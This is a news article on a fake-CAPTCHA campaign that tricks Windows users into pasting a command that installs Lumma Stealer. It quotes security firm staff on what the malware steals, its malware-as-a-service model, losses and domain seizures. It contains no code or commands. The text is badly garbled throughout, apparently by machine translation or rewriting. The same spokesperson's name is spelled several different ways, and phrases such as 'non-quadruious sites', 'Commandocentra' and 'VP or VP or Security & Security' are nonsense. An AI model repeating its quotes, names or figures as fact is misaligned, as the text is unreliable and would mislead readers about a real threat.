Hackers Using Fake Captchas to Spread Lumma Stealer Malware

Poor actors use fake -captchas instructions to distribute Fileless Lumma Stealware, according to Research by cyber security company DNS filter.

First detected on a Greek bank website, the promptly asks for Windows users who perform and paste the copying and pasting in the dialog box and then to press Enter.

DNS filter reports that the company’s customers have dealt with the fake captcha 23 times in the course of three days, and that 17% of the people who have found the promptly completed their steps on the screen, resulting in the attempt to deliver malware.

What is Lumma Stealer?

The global partner of DNS filter, Evangelist, Mikey Pruertt, explained that Lumma Stealer is a form of malware looking for an infected device for references and other sensitive data.

“Lumma Stealer immediately wipes the system for everything it can earn-browser-saved passwords and cookies, stored 2FA tokens, cryptocurrency wallet data, remotely accessible references and even password manager safes,” he said Decrypt.

Pruitte clarified that the bad actors use discontinued data for different purposes that all usually amount to monetary profit, such as ID theft and access to “online accounts for financial theft or fraudulent transactions”, as well as access to cryptocurrency wallet.

Lumma Stealer has a wide range, according to PruTt, and can be found on a wide range of websites.

“Although we cannot talk about how much has been lost because of this one way, this threat can exist on non-quadruious sites,” he explained. “This makes it incredibly dangerous and important to be aware when things seem suspicious.”

Malware-as-a-service

Lumma Stealer is not only malware, but an example of malware-as-a-service (Maas), that Security companies have reported is responsible for an increase in malware attacks in recent years.

According to ESET -Malware analyst Jakub Tomanek, the operators behind Lumma Stealer develop his functions, refine his ability to avoid malware detection, while they also register domains to host the malware.

He told Decrypt“Their primary goal is to keep the service operational and profitable, to collect monthly subscription costs from affiliated companies – effectively running Lumma Stealer as a sustainable cyber criminal company.”

Because cyber criminates the need to develop malware and underlying infrastructure, meshes such as Lumma Stealer have proved stubbornly popular.

In May, the US Department of Justice seized five internet domains who used bad actors to operate Lumma Stealware, while Microsoft has removed 2,300 comparable domains privately.

Nevertheless, reports have shown that Lumma Stealer has been displayed since May, with a July analysis of trend micro Show that “the number of targeted accounts steadily returned to their usual levels” between June and July.

Malware’s global reach

Part of the attraction of Lumma Stealer is that subscriptions, which are often monthly, are cheap compared to the possible profit.

“Available on dark web forums for only $ 250, this advanced information stealer is specifically aimed at what is most important for cyber criminals-cryptocurrency portfolios, browser-collected references and two-factor-authentication systems,” said Nathaniel Jones, the VP or VP or Security & Security.

Jones told Decrypt That the Lumma Stealer -exploits scale has been ‘alarming’, with 2023 witnessed estimated losses of $ 36.5 million, as well as 400,000 Windows devices that are infected in the room of two months.

“But the real care is not only the figures-it is the strategy for multiple layers of income,” he said. “Lumma not only steals data, it systematically harvests the browser history, system information and even Anydesk configuration files before everything is extracted to the Commandocentra controlled by Russia.”

Increasing the threat of Lumma Stealer is the fact that stolen data is often entered directly in ‘Traffer teams’, which specialize are the theft and resale of references.

“This creates a devastating cascade effect where a single infection can lead to hijacking bank account, theft of cryptocurrency and identity fraud that persists long after the first infringement,” add Jones.

While Darktrace suggested a Russian origin or center for Lumma-related exploits, DNS filter noted that the bad actors who used the Malware service could work from several areas.

“It is common for such malignant activities to involve individuals or groups from several countries,” said Pruert, adding that this is particularly common “with the use of international hosting providers and malware distribution platforms.”